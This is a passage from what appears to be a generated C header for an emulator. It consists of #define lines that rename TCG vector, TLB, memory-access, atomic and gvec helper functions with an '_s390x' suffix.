tcg_gen_mul_vec tcg_gen_mul_vec_s390x #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_s390x #define tcg_gen_usadd_vec tcg_gen_usadd_vec_s390x #define tcg_gen_sssub_vec tcg_gen_sssub_vec_s390x #define tcg_gen_ussub_vec tcg_gen_ussub_vec_s390x #define tcg_gen_smin_vec tcg_gen_smin_vec_s390x #define tcg_gen_umin_vec tcg_gen_umin_vec_s390x #define tcg_gen_smax_vec tcg_gen_smax_vec_s390x #define tcg_gen_umax_vec tcg_gen_umax_vec_s390x #define tcg_gen_shlv_vec tcg_gen_shlv_vec_s390x #define tcg_gen_shrv_vec tcg_gen_shrv_vec_s390x #define tcg_gen_sarv_vec tcg_gen_sarv_vec_s390x #define tcg_gen_shls_vec tcg_gen_shls_vec_s390x #define tcg_gen_shrs_vec tcg_gen_shrs_vec_s390x #define tcg_gen_sars_vec tcg_gen_sars_vec_s390x #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_s390x #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_s390x #define tb_htable_lookup tb_htable_lookup_s390x #define tb_set_jmp_target tb_set_jmp_target_s390x #define cpu_exec cpu_exec_s390x #define cpu_loop_exit_noexc cpu_loop_exit_noexc_s390x #define cpu_reloading_memory_map cpu_reloading_memory_map_s390x #define cpu_loop_exit cpu_loop_exit_s390x #define cpu_loop_exit_restore cpu_loop_exit_restore_s390x #define cpu_loop_exit_atomic cpu_loop_exit_atomic_s390x #define tlb_init tlb_init_s390x #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_s390x #define tlb_flush tlb_flush_s390x #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_s390x #define tlb_flush_all_cpus tlb_flush_all_cpus_s390x #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_s390x #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_s390x #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_s390x #define tlb_flush_page tlb_flush_page_s390x #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_s390x #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_s390x #define tlb_flush_page_by_mmuidx_all_cpus_synced 
tlb_flush_page_by_mmuidx_all_cpus_synced_s390x #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_s390x #define tlb_protect_code tlb_protect_code_s390x #define tlb_unprotect_code tlb_unprotect_code_s390x #define tlb_reset_dirty tlb_reset_dirty_s390x #define tlb_set_dirty tlb_set_dirty_s390x #define tlb_set_page_with_attrs tlb_set_page_with_attrs_s390x #define tlb_set_page tlb_set_page_s390x #define get_page_addr_code_hostp get_page_addr_code_hostp_s390x #define get_page_addr_code get_page_addr_code_s390x #define probe_access probe_access_s390x #define tlb_vaddr_to_host tlb_vaddr_to_host_s390x #define helper_ret_ldub_mmu helper_ret_ldub_mmu_s390x #define helper_le_lduw_mmu helper_le_lduw_mmu_s390x #define helper_be_lduw_mmu helper_be_lduw_mmu_s390x #define helper_le_ldul_mmu helper_le_ldul_mmu_s390x #define helper_be_ldul_mmu helper_be_ldul_mmu_s390x #define helper_le_ldq_mmu helper_le_ldq_mmu_s390x #define helper_be_ldq_mmu helper_be_ldq_mmu_s390x #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_s390x #define helper_le_ldsw_mmu helper_le_ldsw_mmu_s390x #define helper_be_ldsw_mmu helper_be_ldsw_mmu_s390x #define helper_le_ldsl_mmu helper_le_ldsl_mmu_s390x #define helper_be_ldsl_mmu helper_be_ldsl_mmu_s390x #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_s390x #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_s390x #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_s390x #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_s390x #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_s390x #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_s390x #define cpu_ldub_data_ra cpu_ldub_data_ra_s390x #define cpu_ldsb_data_ra cpu_ldsb_data_ra_s390x #define cpu_lduw_data_ra cpu_lduw_data_ra_s390x #define cpu_ldsw_data_ra cpu_ldsw_data_ra_s390x #define cpu_ldl_data_ra cpu_ldl_data_ra_s390x #define cpu_ldq_data_ra cpu_ldq_data_ra_s390x #define cpu_ldub_data cpu_ldub_data_s390x #define cpu_ldsb_data cpu_ldsb_data_s390x #define cpu_lduw_data cpu_lduw_data_s390x #define cpu_ldsw_data cpu_ldsw_data_s390x #define cpu_ldl_data cpu_ldl_data_s390x #define cpu_ldq_data cpu_ldq_data_s390x #define helper_ret_stb_mmu helper_ret_stb_mmu_s390x #define helper_le_stw_mmu helper_le_stw_mmu_s390x #define helper_be_stw_mmu helper_be_stw_mmu_s390x #define helper_le_stl_mmu helper_le_stl_mmu_s390x #define helper_be_stl_mmu helper_be_stl_mmu_s390x #define helper_le_stq_mmu helper_le_stq_mmu_s390x #define helper_be_stq_mmu helper_be_stq_mmu_s390x #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_s390x #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_s390x #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_s390x #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_s390x #define cpu_stb_data_ra cpu_stb_data_ra_s390x #define cpu_stw_data_ra cpu_stw_data_ra_s390x #define cpu_stl_data_ra cpu_stl_data_ra_s390x #define cpu_stq_data_ra cpu_stq_data_ra_s390x #define cpu_stb_data cpu_stb_data_s390x #define cpu_stw_data cpu_stw_data_s390x #define cpu_stl_data cpu_stl_data_s390x #define cpu_stq_data cpu_stq_data_s390x #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_s390x #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_s390x #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_s390x #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_s390x #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_s390x #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_s390x #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_s390x #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_s390x #define 
helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_s390x #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_s390x #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_s390x #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_s390x #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_s390x #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_s390x #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_s390x #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_s390x #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_s390x #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_s390x #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_s390x #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_s390x #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_s390x #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_s390x #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_s390x #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_s390x #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_s390x #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_s390x #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_s390x #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_s390x #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_s390x #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_s390x #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_s390x #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_s390x #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_s390x #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_s390x #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_s390x #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_s390x #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_s390x #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_s390x #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_s390x #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_s390x #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_s390x #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_s390x #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_s390x #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_s390x #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_s390x #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_s390x #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_s390x #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_s390x #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_s390x #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_s390x #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_s390x #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_s390x #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_s390x #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_s390x #define 
helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_s390x #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_s390x #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_s390x #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_s390x #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_s390x #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_s390x #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_s390x #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_s390x #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_s390x #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_s390x #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_s390x #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_s390x #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_s390x #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_s390x #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_s390x #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_s390x #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_s390x #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_s390x #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_s390x #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_s390x #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_s390x #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_s390x #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_s390x #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_s390x #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_s390x #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_s390x #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_s390x #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_s390x #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_s390x #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_s390x #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_s390x #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_s390x #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_s390x #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_s390x #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_s390x #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_s390x #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_s390x #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_s390x #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_s390x #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_s390x #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_s390x #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_s390x #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_s390x #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_s390x #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_s390x #define helper_atomic_xor_fetchq_le_mmu 
helper_atomic_xor_fetchq_le_mmu_s390x #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_s390x #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_s390x #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_s390x #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_s390x #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_s390x #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_s390x #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_s390x #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_s390x #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_s390x #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_s390x #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_s390x #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_s390x #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_s390x #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_s390x #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_s390x #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_s390x #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_s390x #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_s390x #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_s390x #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_s390x #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_s390x #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_s390x #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_s390x #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_s390x #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_s390x #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_s390x #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_s390x #define helper_atomic_xchgb helper_atomic_xchgb_s390x #define helper_atomic_fetch_addb helper_atomic_fetch_addb_s390x #define helper_atomic_fetch_andb helper_atomic_fetch_andb_s390x #define helper_atomic_fetch_orb helper_atomic_fetch_orb_s390x #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_s390x #define helper_atomic_add_fetchb helper_atomic_add_fetchb_s390x #define helper_atomic_and_fetchb helper_atomic_and_fetchb_s390x #define helper_atomic_or_fetchb helper_atomic_or_fetchb_s390x #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_s390x #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_s390x #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_s390x #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_s390x #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_s390x #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_s390x #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_s390x #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_s390x #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_s390x #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_s390x #define helper_atomic_xchgw_le helper_atomic_xchgw_le_s390x #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_s390x #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_s390x #define helper_atomic_fetch_orw_le 
helper_atomic_fetch_orw_le_s390x #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_s390x #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_s390x #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_s390x #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_s390x #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_s390x #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_s390x #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_s390x #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_s390x #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_s390x #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_s390x #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_s390x #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_s390x #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_s390x #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_s390x #define helper_atomic_xchgw_be helper_atomic_xchgw_be_s390x #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_s390x #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_s390x #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_s390x #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_s390x #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_s390x #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_s390x #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_s390x #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_s390x #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_s390x #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_s390x #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_s390x #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_s390x #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_s390x #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_s390x #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_s390x #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_s390x #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_s390x #define helper_atomic_xchgl_le helper_atomic_xchgl_le_s390x #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_s390x #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_s390x #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_s390x #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_s390x #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_s390x #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_s390x #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_s390x #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_s390x #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_s390x #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_s390x #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_s390x #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_s390x #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_s390x #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_s390x #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_s390x #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_s390x #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_s390x #define 
helper_atomic_xchgl_be helper_atomic_xchgl_be_s390x #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_s390x #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_s390x #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_s390x #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_s390x #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_s390x #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_s390x #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_s390x #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_s390x #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_s390x #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_s390x #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_s390x #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_s390x #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_s390x #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_s390x #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_s390x #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_s390x #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_s390x #define helper_atomic_xchgq_le helper_atomic_xchgq_le_s390x #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_s390x #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_s390x #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_s390x #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_s390x #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_s390x #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_s390x #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_s390x #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_s390x #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_s390x #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_s390x #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_s390x #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_s390x #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_s390x #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_s390x #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_s390x #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_s390x #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_s390x #define helper_atomic_xchgq_be helper_atomic_xchgq_be_s390x #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_s390x #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_s390x #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_s390x #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_s390x #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_s390x #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_s390x #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_s390x #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_s390x #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_s390x #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_s390x #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_s390x #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_s390x #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_s390x #define helper_atomic_umax_fetchq_be 
helper_atomic_umax_fetchq_be_s390x #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_s390x #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_s390x #define cpu_ldub_code cpu_ldub_code_s390x #define cpu_lduw_code cpu_lduw_code_s390x #define cpu_ldl_code cpu_ldl_code_s390x #define cpu_ldq_code cpu_ldq_code_s390x #define helper_div_i32 helper_div_i32_s390x #define helper_rem_i32 helper_rem_i32_s390x #define helper_divu_i32 helper_divu_i32_s390x #define helper_remu_i32 helper_remu_i32_s390x #define helper_shl_i64 helper_shl_i64_s390x #define helper_shr_i64 helper_shr_i64_s390x #define helper_sar_i64 helper_sar_i64_s390x #define helper_div_i64 helper_div_i64_s390x #define helper_rem_i64 helper_rem_i64_s390x #define helper_divu_i64 helper_divu_i64_s390x #define helper_remu_i64 helper_remu_i64_s390x #define helper_muluh_i64 helper_muluh_i64_s390x #define helper_mulsh_i64 helper_mulsh_i64_s390x #define helper_clz_i32 helper_clz_i32_s390x #define helper_ctz_i32 helper_ctz_i32_s390x #define helper_clz_i64 helper_clz_i64_s390x #define helper_ctz_i64 helper_ctz_i64_s390x #define helper_clrsb_i32 helper_clrsb_i32_s390x #define helper_clrsb_i64 helper_clrsb_i64_s390x #define helper_ctpop_i32 helper_ctpop_i32_s390x #define helper_ctpop_i64 helper_ctpop_i64_s390x #define helper_lookup_tb_ptr helper_lookup_tb_ptr_s390x #define helper_exit_atomic helper_exit_atomic_s390x #define helper_gvec_add8 helper_gvec_add8_s390x #define helper_gvec_add16 helper_gvec_add16_s390x #define helper_gvec_add32 helper_gvec_add32_s390x #define helper_gvec_add64 helper_gvec_add64_s390x #define helper_gvec_adds8 helper_gvec_adds8_s390x #define helper_gvec_adds16 helper_gvec_adds16_s390x #define helper_gvec_adds32 helper_gvec_adds32_s390x #define helper_gvec_adds64 helper_gvec_adds64_s390x #define helper_gvec_sub8 helper_gvec_sub8_s390x #define helper_gvec_sub16 helper_gvec_sub16_s390x #define helper_gvec_sub32 helper_gvec_sub32_s390x #define helper_gvec_sub64 helper_gvec_sub64_s390x #define helper_gvec_subs8 helper_gvec_subs8_s390x #define helper_gvec_subs16 helper_gvec_subs16_s390x #define helper_gvec_subs32 helper_gvec_subs32_s390x #define helper_gvec_subs64 helper_gvec_subs64_s390x #define helper_gvec_mul8 helper_gvec_mul8_s390x #define helper_gvec_mul16 helper_gvec_mul16_s390x #define helper_gvec_mul32 helper_gvec_mul32_s390x #define helper_gvec_mul64 helper_gvec_mul64_s390x #define helper_gvec_muls8 helper_gvec_muls8_s390x #define helper_gvec_muls16 helper_gvec_muls16_s390x #define helper_gvec_muls32 helper_gvec_muls32_s390x #define helper_gvec_muls64 helper_gvec_muls64_s390x #define helper_gvec_neg8 helper_gvec_neg8_s390x #define helper_gvec_neg16 helper_gvec_neg16_s390x #define helper_gvec_neg32 helper_gvec_neg32_s390x #define helper_gvec_neg64 helper_gvec_neg64_s390x #define helper_gvec_abs8 helper_gvec_abs8_s390x #define helper_gvec_abs16 helper_gvec_abs16_s390x #define helper_gvec_abs32 helper_gvec_abs32_s390x #define helper_gvec_abs64 helper_gvec_abs64_s390x #define helper_gvec_mov helper_gvec_mov_s390x #define helper_gvec_dup64 helper_gvec_dup64_s390x #define helper_gvec_dup32 helper_gvec_dup32_s390x #define helper_gvec_dup16 helper_gvec_dup16_s390x #define helper_gvec_dup8 helper_gvec_dup8_s390x #define helper_gvec_not helper_gvec_not_s390x #define helper_gvec_and helper_gvec_and_s390x #define helper_gvec_or helper_gvec_or_s390x #define helper_gvec_xor helper_gvec_xor_s390x #define helper_gvec_andc helper_gvec_andc_s390x #define helper_gvec_orc helper_gvec_orc_s390x #define 
